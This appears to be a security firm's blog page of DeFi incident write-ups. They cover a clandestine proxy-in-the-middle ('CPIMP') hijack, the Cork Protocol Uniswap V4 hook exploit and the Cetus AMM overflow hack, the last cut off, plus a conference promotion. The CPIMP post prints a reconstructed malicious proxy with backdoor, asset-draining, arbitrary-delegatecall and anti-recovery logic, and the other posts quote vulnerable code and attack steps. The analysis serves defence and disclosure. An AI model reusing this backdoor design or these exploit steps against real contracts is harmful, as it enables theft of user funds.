Blog

  • The CPIMP Attack: an insanely far-reaching vulnerability, successfully mitigated

    The CPIMP Attack: an insanely far-reaching vulnerability, successfully mitigated

    [by the Dedaub team]

    A major attack on several prominent DeFi protocols over many blockchains was (largely) successfully mitigated last week. The threat potentially affected (at a minimum) tens of millions of dollars in overall value, and yet the attacker was waiting for even more before making their move!

    The most technically-interesting aspects of the threat don’t have to do with the infection method, but with the attack’s clandestine nature: the attack contracts had been hiding in plain sight for weeks, infiltrating (in custom ways!) multiple protocols, while making sure that they remained entirely transparent both to regular protocol execution and to contract browsing on etherscan.

    We dub the attack vector CPIMP, for “Clandestine Proxy In the Middle of Proxy”, to capture its essence memorably.

    The Contact

    David Benchimol from Venn is no stranger. A few times before, he had brought to our attention potential attack vectors and we had long exchanges on determining feasibility and impact, with the help of our tools.

    On the afternoon of July 8, he put us on high alert, in a hurry!

    David was investigating a red flag raised by his colleague Ruslan Kasheparov. They had found several proxy initializations that had apparently been front-run, to insert malicious implementations.

    Nothing new here, right? Any uninitialized proxy contract can be taken over by the first caller of the initialization function.
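
    As a reminder of the underlying weakness, here is a generic sketch (ours, not code from any affected protocol) of an initializer with no access control; whoever calls it first, including a front-runner of the legitimate initialization transaction, becomes the owner:

    pragma solidity ^0.8.20;

    contract UninitializedImplementation {
        address public owner;
        bool private initialized;

        // No access control: the first caller claims ownership of the proxied contract.
        function initialize(address _owner) external {
            require(!initialized, "already initialized");
            initialized = true;
            owner = _owner;
        }
    }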

    The difference in the case of the Clandestine Proxy In the Middle of Proxy (CPIMP) is that:

    • the CPIMP keeps track of the original intended implementation
    • the (legitimate owner’s) initialization transaction goes through, without reverting
    • the CPIMP stays in hiding, trying to be entirely transparent to the operation of the protocol: most normal calls propagate to the original implementation and execute correctly
    • at the end of every transaction, the CPIMP restores itself in the implementation slot of the proxy, so it is not removable by any usual or custom upgrade procedure
    • the CPIMP installation is done in such a way that it spoofs events and storage slot contents so that the most popular blockchain explorer, etherscan, reports the legitimate implementation, and not the CPIMP, as the implementation of the proxy.

    (In the future, etherscan will be updated to report the CPIMP correctly — more on that later.)

    So the CPIMP is truly a clandestine proxy in the middle!

    An example front-running initialization transaction is shown below.

    This is, of course, code controlled by the attacker. But note the two telltale Upgraded events.

    After this point, the victim proxy points to a malicious CPIMP as its implementation. Yet transactions proceed as normal. A careful observer can see the presence of the CPIMP in any transaction explorer:

    Note that dispatching the call required two delegatecall instructions, not just one! Instead of delegating from the proxy to the legitimate implementation, the execution delegates first to the CPIMP, which then delegates to the legitimate implementation.

    The attacker is simply lying in wait, perhaps holding out for bigger fish before revealing their presence.

    The Impact

    At the time of contacting us, David already knew that this was not an isolated incident but one affecting tens of contracts. What none of us knew, however, was the extent of the threat.

    Drafting the right query on our DB to determine all affected contracts was not a trivial task. A reasonable first version looked like this:

    (If you run this query, be sure to set the Duration to more than the default “last 24 hrs”.)

    Over the next hours, the query improved a lot, capturing all threatened contracts, over multiple networks, with very few false positives. But even early on, a clear picture emerged: there were many protocols at risk, and triaging the threat fully would take weeks, if not months!

    The contracts that had been taken over by CPIMPs belonged (on different chains) to projects like EtherFi, Pendle, Bera, Orderly Network, Origin, KIP Protocol, Myx, and several more tokens, protocols, oracles, etc. Not all of these were equally vulnerable. In many cases the threat was low. E.g., Pendle had successfully migrated from the infected contracts three weeks earlier and confirmed that they were not vulnerable (although they lost some small amounts in the process because of anti-recovery mechanisms that the CPIMP employed).

    But with several tens of contracts already infected, and many of them appearing to have significant privileges, we had to act, even before fully determining the extent of the threat.

    The War Room

    SEAL 911 and its fearless leader @pcaversaccio are the absolute best to run any war room, and even more so for a war room over a broad, multi-protocol vulnerability!

    For the next 36 hours, we alternated frantically between triaging the threat over infected contracts and seeking contacts from all affected protocols that we could identify.

    The main problem was that mitigation could not be atomic, and any “fix” for one protocol ran a grave risk of notifying the attacker that they had been discovered. This might cause imminent attacks on other protocols, possibly before we were even aware of the extent of the threat to those protocols. The attacker had months to prepare and estimate what they could steal; we only had hours!

    And triaging such a vulnerability is far from easy. Take the case of the Orderly Network CrossChainManager on BNB Chain. The contract can clearly perform actions (e.g., deposit) that will be accepted cross-chain, via LayerZero. But how serious is the threat? Are there timelocks on the other end? Is there some off-chain alerting that will trigger and can help mitigate an attack? Without inspecting large amounts of code, one could not be sure of the severity of a potential attack.

    With all this in mind, in the hours that followed, security contacts for all affected protocols that we could find were brought into the war room. SEAL’s @pcaversaccio ran the show and coordinated the rescues so that minimal information would be leaked. Every solution needed to be custom: in many cases, protocols had to work with a CPIMP that had to be fooled into approving their rescue transactions. Also, most rescues had to run at approximately the same time, before the attacker could react.

    The end result was not perfect, but it was very successful for such a broad vulnerability. The attack is still ongoing, with the attacker still trying to profit from victim contracts that remain vulnerable. However, the overwhelmingly largest part of the threat has been mitigated.

    David’s tweet is the best starting point for following the reactions and aftermath.

    Individual protocols have since published [their] [own] [disclosures].

    Dissecting the CPIMP: a Backdoor Powerhouse

    The true sophistication of the CPIMP emerges when inspecting its decompiled code, which we’ve analyzed across multiple variants. This reveals a highly-engineered contract designed for persistent dominance, flexibility, evasion of detection, and targeted asset exfiltration. Below is a simplified, summarized decompilation of an Ethereum variant, highlighting buried mechanisms like signature-triggered executions, granular routing, and shadow storage controls:

    // Manually reverse-engineered decompiled excerpt from malicious proxy (based 
    // on bytecode analysis)
    contract MaliciousProxy {
      address private immutable backdoor =
        0xa72df45a431b12ef4e37493d2bcf3d19af3d24fa;
      address private owner;  // Shadow owners possible via multiple slots
      address private _implementation;
      address private _admin;
      mapping(bytes4 => uint8) private selectorModes;  
        // 0=normal, 1=blocked, 2=permissioned
      mapping(bytes4 => address) private selectorToImpl;
      mapping(bytes4 => mapping(address => address)) private perCallerRouting;
      mapping(bytes4 => mapping(address => bool)) private permissions;
      mapping(bytes4 => bool) private silentFlags;  // Suppress events/logs
      mapping(address => bool) private whitelists;
      uint256 private nonce;  // Anti-replay in signatures
    
      modifier backdoorOrOwner() {
        if (msg.sender != backdoor && msg.sender != owner)
          revert("Unauthorized");
        _;
      }
    
      // ?
     
      function drainAssets(address[] calldata tokens) external backdoorOrOwner {
        // Bulk drain tokens, with special handling of ETH
      }
    
      function signedTakeover(bytes calldata data, uint8 v, bytes32 r, 
                              bytes32 s) external {
        // Off-chain triggered via ecrecover
        bytes32 hash = keccak256(abi.encodePacked(
                          "\x19Ethereum Signed Message:\n", data.length, data));
        address signer = ecrecover(hash, v, r, s);
        require(signer == backdoor, "Invalid sig");
        address(this).delegatecall(data);  // Execute arbitrary payload
      }
    
      function updateRouting(bytes4[] calldata selectors, 
                             address[] calldata impls, 
                             uint8[] calldata modes) external backdoorOrOwner {
        // Granular routing updates
        for (uint i = 0; i < selectors.length; i++) {
          selectorToImpl[selectors[i]] = impls[i];
          selectorModes[selectors[i]] = modes[i];
        }
      }
    
      // Complex Routing logic 
      function getImplementation(bytes4 selector) private returns (address) {
        if (perCallerRouting[selector][_implementation] != address(0)) {
          return perCallerRouting[selector][_implementation];
        } else if (perCallerRouting[selector][address(0)] != address(0)) {
          return perCallerRouting[selector][address(0)];
        } else {
          return _implementation;
        }
      }
    
      // code to restore CPIMP in implementation slot(s)
      function postDelegateReset() private {
        // Slot integrity check/reset (prevents upgrades)
        if (STORAGE[keccak256("eip1967.proxy.implementation") - 1] != 
            _implementation) {
          STORAGE[keccak256("eip1967.proxy.implementation") - 1] =
            _implementation;
        }
        if (_admin != expectedAdmin) {  // Similarly for admin/beacon slots
          _admin = expectedAdmin;
        }
        // Additional resets for owners, nonces if altered during call
      }
    
      // Fallback delegates to routed implementation
      fallback() external payable {
        address impl = getImplementation(msg.sig);
        (bool success, bytes memory ret) = impl.delegatecall(msg.data);
        require(success);
        postDelegateReset(); 
        assembly { return(add(ret, 0x20), mload(ret)) }
      }
    
      // Additional: Direct storage writes, nonce for replays, etc.
      function updateManyStorageSlots(uint256[] calldata index, bytes32[] calldata value)
       external backdoorOrOwner {
         // Updates multiple storage slots simultaneously
      }
    }

    Although the reverse-engineering above is incomplete, several important elements are clear. The CPIMP extends far beyond a simple relay, embedding a suite of controls for hijacking, persistence, and evasion:

    • Backdoor Authorization with Shadows: The hardcoded backdoor (0xa72df45a…) as an immutable variable overrides ownership for upgrades, drains, and executions, acting as a super-admin. Multiple “owner” slots (e.g., shadow admins) allow stealthy swaps, while the functionality enables unrestricted calls/delegatecalls.
    • Granular Function-Level Routing and Modes: Selectors map to custom implementations or per-caller targets, supporting partial hijacks (e.g., only divert transfers). Enum modes (normal/blocked/permissioned) add flexibility, with whitelists exempting users—ideal for selective attacks without alerting everyone.
    • Protocol-specific logic: The advanced routing mechanism enabled protocol-specific logic to be overridden, without triggering an upgrade to the malicious proxy. We’ve seen multiple instances of specific logic that was added by the attacker to thwart recovery. CPIMPs were sometimes nested, with one pointing to another.
    • Anti-recovery: some of the sub-proxies that are routed into have hard-coded checks to make sure that the balance does not dip by more than a specific amount in a single transaction (e.g., >90% transfers revert). To evade detection, instead of calling a public function on itself (which would appear in a call trace), the check reads the relevant storage slots directly. This prevented large rescues (e.g., of >90% of balances), something that Pendle had to face in their recovery.
    • Restoring the CPIMP if removed: after delegating to the original implementation, the CPIMP restores itself in the implementation slot, to prevent upgrades that remove it.
    • Advanced Anti-Detection: Silent upgrades (which selectively emit an Upgraded event based on some preconditions).
    • Batch ETH and Token Draining: The fallback is payable, allowing ETH to accumulate. There is also bulk-draining support: arrays of tokens (and ETH) can be approved and transferred to the backdoor in one call.
    • Silent Attacks: Signed executions allow operations to take place on L2s, even if the admin/superadmin is blacklisted! Batch operations and direct storage writes (arbitrary slot sets) facilitate the complex chains of operations needed to attack specific protocols.
    • Persistence and Automation Hooks: Counters/nonces track deployments, so that the attacker does not mess up the proxy.

    The attacker’s investment shines through: This isn’t opportunistic — it’s a framework for automated, resilient campaigns to be triggered when the time comes.

    The Sneakiness

    What is perhaps most striking about the CPIMP attack is its sneakiness. The attacker was waiting for even bigger fish and had customized their different CPIMPs for different victims. The extent of manual effort per CPIMP infection seems substantial.

    Perhaps the most interesting of these measures has been the attacker’s attention to not being detectable by etherscan’s “read/write as proxy” feature. If one visits a victim contract’s page, etherscan does not report the CPIMP as the implementation, but instead lists the legitimate implementation contract.

    This is not too surprising, right? All the attacker needs is to emit fake events, and the service will be fooled.

    Well … no!

    Etherscan’s implementation detection is more sophisticated than that, and the attacker spent significant effort circumventing it. Specifically, etherscan consults the value of storage slots in the proxy contract in order to determine the implementation. Since there is no single standard for where a proxy stores the address of its implementation, each proxy type has its own slot. In this case, the infected proxies are EIP-1967 proxies. However, the attacker inserted a decoy implementation address (the legitimate one, rather than the CPIMP) in a slot used by an older OpenZeppelin proxy standard, fooling etherscan into reporting that slot’s contents as the implementation!
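
    For the curious, the two slots involved look roughly like this (our sketch: the EIP-1967 constant is standard, while the exact legacy slot shown, ZeppelinOS-style unstructured storage, is our assumption about which older layout is being consulted):

    pragma solidity ^0.8.20;

    library ProxyImplementationSlots {
        // EIP-1967: bytes32(uint256(keccak256("eip1967.proxy.implementation")) - 1)
        bytes32 internal constant EIP1967_IMPL_SLOT =
            0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;

        // Legacy ZeppelinOS-style unstructured storage slot (assumption about the
        // older standard): keccak256("org.zeppelinos.proxy.implementation")
        bytes32 internal constant LEGACY_ZOS_IMPL_SLOT =
            keccak256("org.zeppelinos.proxy.implementation");
    }

    Reading both slots of a victim proxy off-chain (e.g., via a raw eth_getStorageAt call) would reveal the discrepancy: the EIP-1967 slot holds the CPIMP, while the spoofed legacy slot holds the decoy implementation.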

    The SEAL 911 war room brought in etherscan security contacts, in addition to the victim protocols. As a result, etherscan has quickly marked all contracts that our investigation identified, and is planning to fix the bug that led to the misleading implementation report.

    Parting Words

    Investigating and mitigating the CPIMP attack vector was a very interesting experience: this was an extensive, highly-sophisticated man-in-the-middle-style hijacking that had already infected many well-known protocols on several chains (Ethereum, BNB Chain, Arbitrum, Base, Bera, Scroll, Sonic).

    The adrenaline rush from the investigation was incredible and it’s rewarding that most potential loss has been prevented, via a well-coordinated effort. David put it best, so we’ll close with his message:

  • Dedaub at EthCC[8] | Smart Contract Security Before and After Deployment

    Dedaub at EthCC[8] | Smart Contract Security Before and After Deployment

    Dedaub at ETHCC

    Dedaub is heading to Cannes! As a WAGMI sponsor at EthCC[8], we’re bringing end-to-end smart contract security, combining rigorous auditing with continuous, custom-built monitoring. Security is a mindset. Auditing gets you to launch. Monitoring keeps you going.

    Dedaub’s security technology stack enables our team to analyze onchain data to create a comprehensive security framework tailored to your project’s unique risk profile and operational logic.

    EthCC[8] | Where to find us

    📍 Palais des Festivals, Cannes | WAGMI Sponsor Zone

    You’ll find us on Level 3, ready to showcase how Dedaub delivers ongoing protection. From pre-deployment threat modeling to real-time monitoring agents, we offer a tailored security lifecycle for your protocol.

    End-to-end Smart Contract Security

    Real-time Monitoring

    Dedaub provides a custom-built monitoring service, setting up and maintaining custom agents based on your protocol’s specific needs. Learn More.

    • DedaubQL-based monitoring agents tailored to your project’s threat model
    • Multi-chain, real-time decoded transaction database
    • Alerting on critical behaviors (vault withdrawals, governance actions, liquidation risks, etc.)
    • Continuous tuning to minimize noise and focus on actionable events

    Multi-Stage Audit Approach

    Auditing with Dedaub is an in-depth review of your protocol’s design, risks, and code. We identify critical vulnerabilities that could lead to real-world exploits. Learn More.

    • Every contract is reviewed line by line by at least two senior auditors, each covering 100% of the scope.
    • We run dual-phase reviews: first for intended logic, then from an adversarial perspective.
    • Findings are peer-reviewed and internally challenged to identify hidden risks and ensure complete clarity.
    • Our advanced technology stack employs over 70 analyses, supporting expert-led reasoning with comprehensive tooling. 

    About EthCC[8]

    EthCC[8] is the eighth edition of the Ethereum Community Conference, a major European gathering for the Ethereum ecosystem. It’s a four-day event focused on technology, community, and learning, taking place in Cannes, France, from June 30 to July 3, 2025. EthCC is the largest annual European Ethereum event, organized by Ethereum France, and it serves as a space to connect, learn, share knowledge, and discuss the latest developments in Web3 technology.

  • The $11M Cork Protocol Hack: A Critical Lesson in Uniswap V4 Hook Security

    The $11M Cork Protocol Hack: A Critical Lesson in Uniswap V4 Hook Security

    On the 28th of May 2025, Cork Protocol suffered an $11M exploit due to multiple security weaknesses, culminating in a critical access control vulnerability in their Uniswap V4 hook implementation. The attacker exploited missing validation in the hook’s callback functions, fooling the protocol into thinking that valuable tokens (Redemption Assets) had been deposited by the attacker, thus crediting the attacker with derivative tokens that could be exchanged back into other valuable tokens. The attacker also exploited a flaw in the risk premium calculation, which compounded the attack. Among other things, this incident highlights the importance of proper access control in Uniswap V4 hooks and the risks of highly flexible open designs, which are very hard to secure.

    Background

    Understanding Cork Protocol

    Cork Protocol is a depeg insurance platform built on Uniswap V4 that allows users to hedge against stablecoin or liquid staking token depegs. The protocol operates with four token types per market:

    • RA (Redemption Asset): The “original” asset (e.g., wstETH)
    • PA (Pegged Asset): The “riskier” pegged asset (e.g., weETH)
    • DS (Depeg Swap): Insurance token that pays out if PA depegs from RA
    • CT (Cover Token): The counter-position that earns yield but loses value if depeg occurs

    Another way to think of the DS is as a put option at a fixed strike price denominated in RA, while the CT is the corresponding short put.

    Users can mint DS + CT by depositing RA, effectively splitting the redemption asset into two complementary positions. A legitimate transaction demonstrating this in action can be found here.

    Unlike modern options protocols such as Opyn, the DS is fully collateralized with RA, which simplifies trust assumptions.

    Understanding Uniswap V4

    Uniswap V4 represents a significant architectural shift, moving to a central PoolManager (Singleton pattern) and introducing ‘hooks’ – external contracts that the PoolManager calls at various points in a pool’s lifecycle (e.g., before or after swaps, liquidity changes). This design, as highlighted by security experts like Damien Rusinek, offers immense flexibility and customization but, as the Cork Protocol incident demonstrates, also introduces new, critical security considerations for developers.

    Vulnerability 1: Missing Access Control

    An important vulnerability in the CorkHook contract was a critical access-control oversight, directly echoing a common pitfall that many security researchers have warned about. Cork’s Uniswap hooks were called by the attacker’s smart contract directly, mid-transaction. Let’s examine the vulnerable beforeSwap function:

    function beforeSwap(
    	address sender,
    	PoolKey calldata key,
    	IPoolManager.SwapParams calldata params,
    	bytes calldata hookData
    ) external override returns (bytes4, BeforeSwapDelta delta, uint24) {
    	PoolState storage self = pool[toAmmId(Currency.unwrap(key.currency0), Currency.unwrap(key.currency1))];
    	// kinda packed, avoid stack too deep 
    	delta = toBeforeSwapDelta(-int128(params.amountSpecified), int128(_beforeSwap(self, params, hookData, sender)));
    	// TODO: do we really need to specify the fee here?
    	return (this.beforeSwap.selector, delta, 0);
    }

    Critical Issue: This function lacks an onlyPoolManager modifier (which would allow calls only from the trusted Uniswap v4 PoolManager), meaning anyone can call it directly with arbitrary parameters. While the contract inherits from BaseHook, which provides access control for unlockCallback, it fails to protect the other hook callbacks.

    // BaseHook provides this for unlockCallback: 
    modifier onlyPoolManager() {
    	require(msg.sender == address(poolManager), "Caller not pool manager"); _;
    }

    Vulnerability 2: Risk premium calculation rollover

    The risk premium, which affects the price of the derivative (CT) tokens, takes an extreme value close to expiry. The exploiter acquired a small amount of DS tokens close to expiry, manipulating the price ratio of CT to RA tokens. On rollover (to a new expiry period), this skewed ratio was used to compute how many CT and RA tokens to deposit into the AMM. With a skewed ratio of CT to RA tokens deposited, the exploiter could convert a very small amount of 0.0000029 wstETH into 3760.8813 weETH-CT.


    The Attack

    Cork Protocol allowed DS (insurance) tokens from one market to be used as RA (safe asset) tokens in another market. This was likely not an intentional design choice; the protocol authors probably did not consider the possibility. A consequence is that relatively valuable tokens (DS tokens) from a legitimate market can potentially be extracted through another market if a vulnerability exists.

    This relatively obscure security weakness compounded the exploit, which the attacker perpetrated as a very complex, multi-step attack.

    Step 1: Cross-Market Token Confusion

    The attacker created a new market configuration that used the DS token of another market as the RA token of the new market.

    // Legitimate market
    Legit Market: {
    	RA: wstETH,
    	PA: weETH,
    	DS: weETH-DS,
    	CT: weETH-CT
    }
    
    // Attacker's new market 
    New Market: { 
    	RA: weETH-DS, // Using DS token as RA!
    	PA: wstETH,
    	DS: new_ds,
    	CT: new_ct
    }

    Step 2: Malicious Hook Contract

    The attacker deployed their own contract implementing the hook interface and rate provider interface. The custom rate provider appears to be a red herring in this attack – it simply returns a fixed rate.

    The new market utilized a fresh Uniswap v4 pool created as part of the new market. The attacker also created (in a separate transaction) a Uniswap pool with the same tokens as the newly created pool (trading new_ct and weETH-DS) but with the hacker’s contract as the hook!

    Step 3: Direct Hook Manipulation

    This is where the action takes place. Due to the missing access control, the attacker could directly call beforeSwap to fool the protocol:

    The pool id of the maliciously created pool was passed into the beforeSwap callback. The hook data supplied as part of the callback directed the protocol into an execution flow in which RAs are deposited and CT and DS tokens are returned. However, in this transaction no RAs were actually deposited by the attacker. Instead, the carefully crafted hook data payload fooled the Cork protocol into thinking that the attacker had deposited roughly 3761 weETH-DS, illegitimately crediting the attacker with 3761 new_ct and 3761 new_ds tokens.

    Step 4: DS Token Extraction

    Once the attacker had gained the new_ct and new_ds tokens, they used these to redeem weETH-DS tokens.

    Step 5: wstETH Token Extraction

    Note that in a previous step the attacker had also exploited another edge case to cheaply acquire weETH-CT tokens. Since this article was written, a clearer explanation has been posted by the Cork protocol team about the miscalculations involved; the essence is that the exploiter acquired a small amount of DS tokens close to expiry, manipulating the price ratio of CT to RA tokens for the next expiry period. With this manipulation, the exploiter could convert 0.0000029 wstETH (a very small amount) into 3760.8813 weETH-CT.

    Now, all that remains to be done by the attacker is to redeem these weETH-CT and weETH-DS tokens through the protocol, as intended, to withdraw $11m of wstETH.

    Technical Deep Dive: Hook Manipulation

    The _beforeSwap function contains complex logic for handling swaps, including reserve updates and fee calculations:

    function _beforeSwap(
      PoolState storage self,
      IPoolManager.SwapParams calldata params,
      bytes calldata hookData,
      address sender
    ) internal returns (int256 unspecificiedAmount) {
        // ... swap calculations ...
        // Update reserves without validation
        self.updateReservesAsNative(Currency.unwrap(output), amountOut, true);
        // Settle tokens
        settleNormalized(output, poolManager, address(this), amountOut, true);
        // ... more logic ...
    }

    Without access control, an attacker can:

    • Manipulate reserve ratios before legitimate trades
    • Force the hook to settle tokens with arbitrary amounts
    • Bypass normal swap routing through the PoolManager

    Parsing the arguments used in hookData, the attacker crafted a payload intended to indicate that they had deposited 3761 weETH-DS tokens into the new market.

    Contributing Factors

    1. Decentralized Market Creation

    The protocol allowed anyone to create markets with any token pair. This is a courageous design decision; however, it is clearly hard to pull off correctly.

    function beforeInitialize(address, PoolKey calldata key, uint160) external ... {
        address token0 = Currency.unwrap(key.currency0);
        address token1 = Currency.unwrap(key.currency1);
        
        // Dedaub: No validation on token types!
        // Allows DS tokens to be used as RA tokens
    
    }

    2. Insufficient Token Validation

    The _saveIssuedAndMaturationTime function attempts to validate tokens but fails to ensure proper token types:

    function _saveIssuedAndMaturationTime(PoolState storage self) internal {
        IExpiry token0 = IExpiry(self.token0);
        IExpiry token1 = IExpiry(self.token1);
        // Dedaub: Only checks if tokens have expiry, not their type
        try token0.issuedAt() returns (uint256 issuedAt0) {
            self.startTimestamp = issuedAt0;
            self.endTimestamp = token0.expiry();
            return;
        } catch {}
        // ... similar for token1 ...
    }

    3. No Pool Whitelisting

    The callback allowed pools that had the same tokens but a different hook contract. There was no validation of the pool id nor of the hook contract address. A simple mitigation would have been an explicit whitelist, along the lines of:

    mapping(PoolId => bool) public allowedPools;
    
    modifier onlyAllowedPool(PoolKey calldata key) {
        require(allowedPools[key.toId()], "Pool not allowed");
        _;
    }

    4. Singleton Design

    Tokens from different markets are co-mingled (a consequence of the singleton pattern). Therefore, a vulnerability exploited in the new market could extract tokens belonging to another market.

    Previous Cork Protocol Audits

    Unfortunately, although the Cork protocol had undergone security reviews by four different audit providers, this incident still happened. The protocol team had clearly invested resources in security, making this exploit all the more tragic for both the team and users.

    However, three of the four auditors did not audit the vulnerable hook contracts, and it is uncertain whether the risk premium issue could have been easily found just by looking at the code. It is likely that Cantina/Spearbit had the vulnerable CorkHook contract within their audit scope. A pull request with recommendations shows they did identify some issues and suggested improvements.

    Runtime Verification (another auditor who did not have CorkHook in their scope) presciently noted in their report:

    “An interesting follow-up engagement would be to prove the invariants for the CorkHook functions that are being invoked by different components verified within the scope of this engagement, as well as the functions of other contracts, such as CorkHook, Liquidator and HedgeUnit.”

    This observation now seems particularly prophetic, as it was precisely the CorkHook’s interaction with other components that enabled the exploit.

    Recommendations for Hook Developers

    If you’re building a project that interacts with Uniswap v4 hooks in a meaningful way, get your code audited by experts in the area. Dedaub is a Uniswap-whitelisted audit provider, with plenty of experience securing high-stakes projects. Since Dedaub is whitelisted by Uniswap, the audit can also be paid for via a Uniswap Foundation grant. In the meantime, follow the guidelines below. We also recommend listening to Damien Rusinek’s talk.

    Master Access Control and Permissions

    Strict PoolManager-Only Access: This is non-negotiable. Every external hook function that can modify state or is intended to be called by the PoolManager (e.g., beforeSwap, afterSwap, beforeInitialize) must implement robust access control, typically an onlyPoolManager modifier. This was a primary failing in the Cork exploit. As Damien and Hacken emphasize, allowing direct calls by arbitrary addresses is a direct path to state manipulation and fund loss. Cork didn’t follow this recommendation.

    Correct Hook Address Configuration: Uniswap V4 derives hook permissions (which functions the PoolManager will call) directly from the hook contract’s address.

    Address Mining: Deploy hooks using CREATE2 with a salt that ensures the deployed address correctly encodes all intended permissions (e.g., Hooks.BEFORE_SWAP_FLAG | Hooks.AFTER_SWAP_FLAG). Cork didn’t follow this recommendation.
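
    A rough sketch of such address mining (our illustration, not Cork’s or Uniswap’s code; it assumes the permission flags occupy the low 14 bits of the hook address, and names like desiredFlags and MyHook are placeholders; Uniswap’s v4-periphery ships a similar HookMiner utility):

    pragma solidity ^0.8.20;

    library HookAddressMiner {
        // Assumption: hook permission flags are encoded in the low 14 bits of the address.
        uint160 internal constant FLAG_MASK = (1 << 14) - 1;

        // Brute-forces a CREATE2 salt so that the resulting address encodes desiredFlags.
        // creationCodeWithArgs would be abi.encodePacked(type(MyHook).creationCode,
        // abi.encode(constructorArgs)).
        function find(address deployer, uint160 desiredFlags, bytes memory creationCodeWithArgs)
            internal
            pure
            returns (address hook, bytes32 salt)
        {
            bytes32 initCodeHash = keccak256(creationCodeWithArgs);
            // Bounded search, purely for illustration.
            for (uint256 i = 0; i < 1_000_000; i++) {
                salt = bytes32(i);
                // Standard CREATE2 address derivation.
                hook = address(uint160(uint256(
                    keccak256(abi.encodePacked(bytes1(0xff), deployer, salt, initCodeHash))
                )));
                if ((uint160(hook) & FLAG_MASK) == desiredFlags) {
                    return (hook, salt);
                }
            }
            revert("no matching salt found");
        }
    }

    The hook would then be deployed with the found salt, so that the PoolManager reads the intended permissions from the deployed address.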

    Mismatch Avoidance: A mismatch between the functions implemented in your hook and the permissions encoded in its address will lead to functions not being called or PoolManager attempting to call non-existent functions, causing reverts (DoS).

    Future-Proofing Upgrades: If you plan to add new hookable functions in future upgrades (for UUPS-style proxies), ensure the initial deployment address already encodes these future permissions. Alternatively, include placeholder functions for them.

    Inherit from BaseHook: Whenever possible, inherit from Uniswap’s BaseHook contract. It provides foundational security checks (like onlyPoolManager for unlockCallback) and helps ensure correct interface adherence, reducing the risk of configuration errors.

    Rigorous State Management and Pool Interaction

    Restrict Pools. If a hook is designed for a specific pool or set of pools, it must validate the PoolKey in its functions (especially initialization) to prevent unauthorized pools from using it. Consider implementing an allowedPools mapping and a modifier like onlyAllowedPool. Ensure the hook can only be initialized once (e.g., in beforeInitialize) to restrict it to a single pool if that’s the design. Cork didn’t follow this recommendation.

    Isolate State for Reusable Hooks: If a hook is intended to be shared across multiple legitimate pools, its internal state must be meticulously segregated (e.g., using mapping(PoolId => PoolSpecificData)). Failure to do so can lead to one pool’s activity corrupting another’s state, potentially locking funds or creating exploitable conditions.

    Prevent Cross-Market Token Contamination: As seen in the Cork exploit, avoid designs where tokens (especially sensitive ones like derivatives or collateral) from one market can be misinterpreted or misused as different token types in another market. Enforce strict token type validation at market creation and within hook logic.

    Understand sender vs. msg.sender vs. Transaction Originator. In hook functions like beforeSwap(address sender, ...) the sender parameter is typically the PoolOperator or the PoolManager itself, not the end-user (EOA) who initiated the transaction. If your hook logic needs the actual end-user, that address must be securely passed via the hookData parameter by a trusted PoolOperator.

    Understand Delta Accounting. BeforeSwapDelta and BalanceDelta are from the hook’s perspective. If the hook takes a fee, it must be a negative delta. If it grants a rebate, it’s a positive delta. Ensure the correct order of token deltas (e.g., specified vs. unspecified, or token0 vs. token1) based on the swap direction (params.zeroForOne). Crucially, all deltas must net to zero by the end of the unlockCallback. The PoolManager tracks this with NonzeroDeltaCount. Unsettled balances will cause the transaction to revert. Hooks modifying balances must ensure they (or the user) settle these amounts correctly (e.g., via settle() or take()).

    Upgradability: If your hook is upgradeable, recognize this as a significant trust assumption. A malicious or compromised owner can change the hook’s logic entirely. Ensure the upgrade mechanism is secure and governed transparently.

    Conclusion

    The Cork Protocol hack demonstrates that Uniswap V4 hooks, while powerful, introduce new security considerations that developers must carefully address. The combination of missing access controls and insufficient token validation created a perfect storm for exploitation. As the DeFi ecosystem continues to evolve with more composable protocols, developers must prioritize security at every layer of their architecture.

  • The Cetus AMM $200M Hack: How a Flawed “Overflow” Check Led to Catastrophic Loss

    The Cetus AMM $200M Hack: How a Flawed “Overflow” Check Led to Catastrophic Loss

    On May 22, 2025, the Cetus AMM on the Sui Network suffered a devastating hack resulting in over $200 million in losses. This incident represents one of the most significant DeFi exploits in recent history, caused by a subtle but critical flaw in “overflow” protection. This analysis dissects the technical details of the exploit and examines when this issue was introduced, fixed, and re-introduced.

    Executive Summary

    The attacker exploited a vulnerability that truncates the most significant bits in a liquidity calculation function of the Cetus AMM. This calculation is invoked when a user opens an LP position. When opening such a position, a user can open a large or small position by specifying a “liquidity” parameter (what fraction of the pool you would like to get in return) and supplying the corresponding amount of tokens. By manipulating the liquidity parameter to an extremely high value, they caused an overflow in the intermediate calculations that went undetected due to a flawed truncation check. This allowed them to add massive liquidity positions with just 1 unit of token input, subsequently draining pools collectively containing hundreds of millions of dollars worth of tokens.

    Note: the technical term for the issue is not “overflow” but MSB (most significant bits) truncation; we’ll call it “overflow” for simplicity.

    The Attack Sequence

    The attack unfolded in a carefully orchestrated sequence. Here’s an example of one such attack transaction (simplified):

    1. Flash Swap Initiation: The attacker borrowed 10 million haSUI through a flash swap with maximum slippage tolerance
    2. Position Creation: Opened a new liquidity position with tick range [300000, 300200] – an extremely narrow range at the upper bounds
    3. Liquidity Addition: Added liquidity with just 1 unit of token A, but received a massive liquidity value of 10,365,647,984,364,446,732,462,244,378,333,008. This action succeeded due to an undetected bitwise truncation.
    4. Liquidity Removal: Immediately removed the liquidity in multiple transactions, draining the pool
    5. Flash Loan Repayment: Repaid the flash swap and kept approximately 5.7 million SUI as profit

    Technical Deep Dive: The “Overflow” Vulnerability

    The root cause lies in the get_delta_a function within clmm_math.move, which calculates the amount of token A required for a given liquidity amount:

    public fun get_delta_a(
        sqrt_price_0: u128,
        sqrt_price_1: u128,
        liquidity: u128,
        round_up: bool
    ): u64 {
        let sqrt_price_diff = sqrt_price_1 - sqrt_price_0;
        
        let (numberator, overflowing) = math_u256::checked_shlw(
            // Dedaub: result doesn't fit in 192 bits
            full_math_u128::full_mul(liquidity, sqrt_price_diff)
        );
        // Dedaub: the flawed checked_shlw shifts << 64 and fails to flag the
        // resulting truncation, so this assertion passes even when bits are lost
        assert!(!overflowing);
        
        let denominator = full_math_u128::full_mul(sqrt_price_0, sqrt_price_1);
        let quotient = math_u256::div_round(numberator, denominator, round_up);
        (quotient as u64)
    }
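
    For reference, the computation this function intends to perform (assuming the usual Q64.64 fixed-point representation of sqrt prices, which is why the numerator is shifted left by 64 bits) is roughly:

    delta_a = ((liquidity * (sqrt_price_1 - sqrt_price_0)) << 64) / (sqrt_price_0 * sqrt_price_1)

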